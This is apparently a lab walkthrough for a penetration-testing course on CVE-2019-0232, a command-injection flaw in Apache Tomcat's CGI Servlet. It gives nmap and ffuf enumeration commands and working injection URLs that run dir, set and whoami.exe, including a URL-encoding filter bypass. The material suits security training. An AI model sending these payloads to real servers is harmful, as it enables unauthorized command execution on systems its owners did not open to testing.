17. Attacking Tomcat CGI

1. Vulnerability Overview

CVE-2019-0232 - Remote Code Execution (RCE)

Description: Allows remote code execution due to improper input validation in the CGI Servlet when enableCmdLineArguments is set to true.
Affected Versions:
- Tomcat 9.0.0.M1 to 9.0.17
- Tomcat 8.5.0 to 8.5.39
- Tomcat 7.0.0 to 7.0.93
Cause:
- The CGI Servlet fails to properly sanitize user-supplied input from the query string, leading to command injection.

2. Enumeration

Nmap Scan

Identify open ports and running services, particularly Apache Tomcat.

nmap -p- -sC -Pn 10.129.204.227 --open

CGI Script Discovery (ffuf)

Discover CGI scripts using directory fuzzing.

ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

This command fuzzes for CGI scripts with the .bat extension and may reveal welcome.bat.

3. Exploitation

Basic Command Injection

Execute the dir command to list files.

http://10.129.204.227:8080/cgi/welcome.bat?&dir

Retrieve Environment Variables

Check for useful system environment variables.

http://10.129.204.227:8080/cgi/welcome.bat?&set

This can reveal critical information, such as the PATH variable being unset.

Hardcoded Path Execution (whoami)

Attempt to execute whoami.exe by specifying its full path.

http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe

This may fail if special characters are filtered.

URL Encoding Bypass

Bypass character filtering using URL encoding.

http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe

This allows execution of whoami.exe despite input restrictions.

4. Key Considerations

The enableCmdLineArguments setting must be enabled for this exploit to work.
The & character is used to separate commands in the injection.
If the PATH environment variable is unset, commands must be executed with their full path.
URL encoding can help bypass character filtering.
Only test on systems you have explicit permission to assess.
Replace IP addresses, ports, and URLs with your specific target information.

5. Commands Summary

# Nmap Scan - Identify open ports
nmap -p- -sC -Pn 10.129.204.227 --open

# ffuf - Discover CGI scripts
ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.129.204.227:8080/cgi/FUZZ.bat

# Basic command injection (dir)
http://10.129.204.227:8080/cgi/welcome.bat?&dir

# Retrieve environment variables
http://10.129.204.227:8080/cgi/welcome.bat?&set

# Execute whoami using hardcoded path
http://10.129.204.227:8080/cgi/welcome.bat?&c:\windows\system32\whoami.exe

# URL encoded path execution
http://10.129.204.227:8080/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe

Previous5. Common Gateway Interfaces Next18. Attacking CPI Applications Shellshock

Last updated 21 days ago

hashtag1. Vulnerability Overview

hashtagCVE-2019-0232 - Remote Code Execution (RCE)

hashtag2. Enumeration

hashtagNmap Scan

hashtagCGI Script Discovery (ffuf)

hashtag3. Exploitation

hashtagBasic Command Injection

hashtagRetrieve Environment Variables

hashtagHardcoded Path Execution (whoami)

hashtagURL Encoding Bypass

hashtag4. Key Considerations

hashtag5. Commands Summary